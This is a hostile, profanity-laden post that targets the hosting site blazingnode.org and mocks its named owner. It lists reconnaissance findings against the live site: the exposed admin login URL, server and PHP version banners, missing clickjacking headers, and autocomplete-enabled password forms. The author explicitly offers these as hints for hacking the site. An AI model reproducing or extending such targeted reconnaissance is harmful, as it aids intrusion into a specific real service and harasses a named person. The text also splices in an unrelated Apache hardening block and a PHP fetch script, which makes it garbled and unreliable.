- This won't disclose the biggest vulnerabilities of the website, considering I don't want to expose the deepest gaping holes.
- I want to expose him for not being a hacker.
- https://soundcloud.com/thothey/dr-raid-nice-report
- dedicated to BlazingNode Owner Scott Wiwek.
- You shouldn't have messed with my boy Chrono - the Infamous ILlKiD Atmos The Wicked
- Got to be to the day that I die #DG4E
- If you do argue, after I will be fuzzing your shit, then abuse of Burp, REST, recon, fuzzer, HTTP view, the list goes on; bitch, we toolin' up and write our own sadkunt. Shout out to PP4L, Digital Gangster and thugCrowd.
- Web Server Disclosure
- banner: server: Apache (host: blazingnode.org)
- banner: x-powered-by: PHP/7.0.32 (host: blazingnode.org)
- Did you really think hiding your poor code and premade template behind Cloudflare would stop any real hackers?
- It's just a matter of time before someone finds a bypass. Ahhh, poor little boy, security is an illusion on this Inet.
- Gotta be on point with that bitness fitness.
- X-Frame-Options not used
- Can't set up proper headers, that sucks. Ahhh, didn't learn how to properly set up a web server...
- http://en.wikipedia.org/wiki/X-FRAME-OPTIONS#Frame-Options
- http://en.wikipedia.org/wiki/Clickjacking
- These are just the better-known vulnerabilities that can happen; dig a bit and you will find much more.
- about X-Frame
- uri: https://blazingnode.org/
- email: sales@blazingnode.org
- GET https://blazingnode.org/ HTTP/1.1
- Damn, this fool is not even on HTTP/2. As a provider you should be up to date with the latest technology.
- Admin page discovery
- uri: https://blazingnode.org/admin/login.php?redirect=%2Fadmin%2F
- What the actual fuck, why is this not behind any kind of WAF, SSL gateway, etc.?
- Such a page should always be behind additional security layers and only allow connections from the specific VPN IPs you set up for the company in question.
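An Apache 2.4 configuration fragment, added here as the defensive counterpart to the banner disclosure, missing X-Frame-Options and exposed admin page noted above; it is an added example, not BlazingNode's configuration, and the VPN range 10.8.0.0/24 and the use of mod_php (for the php_flag lines) are assumptions.

```apache
# Stop advertising the Apache version in headers and error pages
ServerTokens Prod
ServerSignature Off

# PHP itself emits X-Powered-By; the right fix is expose_php = Off in php.ini,
# this strips it in case it is still set (requires mod_headers)
Header always unset X-Powered-By

# Refuse framing by other origins (clickjacking defence). Send the CSP
# equivalent as well, since modern browsers prefer frame-ancestors.
Header always set X-Frame-Options "SAMEORIGIN"
Header always set Content-Security-Policy "frame-ancestors 'self'"

# Only the company VPN (assumed 10.8.0.0/24) may reach the admin area
<Location "/admin/">
    Require ip 10.8.0.0/24
</Location>

# Keep PHP errors (and the filesystem paths in them) out of responses
php_flag display_errors Off
php_flag log_errors On
```

If the site stays behind Cloudflare, Apache sees the proxy's address rather than the client's, so configure mod_remoteip (RemoteIPHeader CF-Connecting-IP plus RemoteIPTrustedProxy for Cloudflare's ranges) before relying on Require ip, and make sure the origin is not reachable directly.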
- Path disclosures
- He didn't even learn about HTTP status codes and how they can reveal server path information...
- Ahhh, those pseudo hackers that pretend they know something...
- I bet he doesn't even know the OSI layers.
- AutoComplete Enabled
- uri: https://blazingnode.org/admin/login.php?redirect=%2Fadmin%2F
- <form method="post" action="/admin/dologin.php">
- <form method="post" class="using-password-strength" action="/register.php" role="form" name="orderfrm" id="frmCheckout">
- <form role="form" method="post" action="/index.php?rp=/knowledgebase/search">
- <form method="post" action="contact.php" class="form-horizontal" role="form">
- <form method="post" action="https://blazingnode.org/pwreset.php" role="form">
- uri: https://cp.blazingnode.org:4085/index.php?act=login&redirect=%2F
- <form accept-charset="UTF-8" action="" method="post" name="loginform" class="form-horizontal">
- uri: https://blazingnode.org/admin/login.php?action=reset
- <form action="/admin/login.php" method="post" id="frmResetPassword">
- Well, I would like to thank you for allowing us to easily grab credentials.
- It makes the job much easier this way.
- The game is either to be sold or taught. So I won't post the best vulnerabilities or paths.
- But I'm nice enough to give a list of little hints to proceed with successful hacking of blazingnode.
<?php
// Fetch one static asset with PEAR HTTP_Request2 and print its body.
require_once 'HTTP/Request2.php';

$request = new HTTP_Request2("https://blazingnode.org/templates/blazingnode/js/scripts.min.js?v=5d11cc");
$request->setAdapter('curl');
$request->setMethod(HTTP_Request2::METHOD_GET);

try {
    $response = $request->send();
} catch (HTTP_Request2_Exception $e) {
    // Without this exit, $response would be undefined below when send() throws
    echo 'Error: ' . $e->getMessage();
    exit(1);
}

if ($response->getStatus() == 200) {
    echo $response->getBody();
} else {
    echo 'Unexpected HTTP status: ' . $response->getStatus() . ' ' . $response->getReasonPhrase();
}
- rated high on OWASP
- https://blazingnode.org/admin/login.php?redirect=%2Fadmin%2F
- WHMCS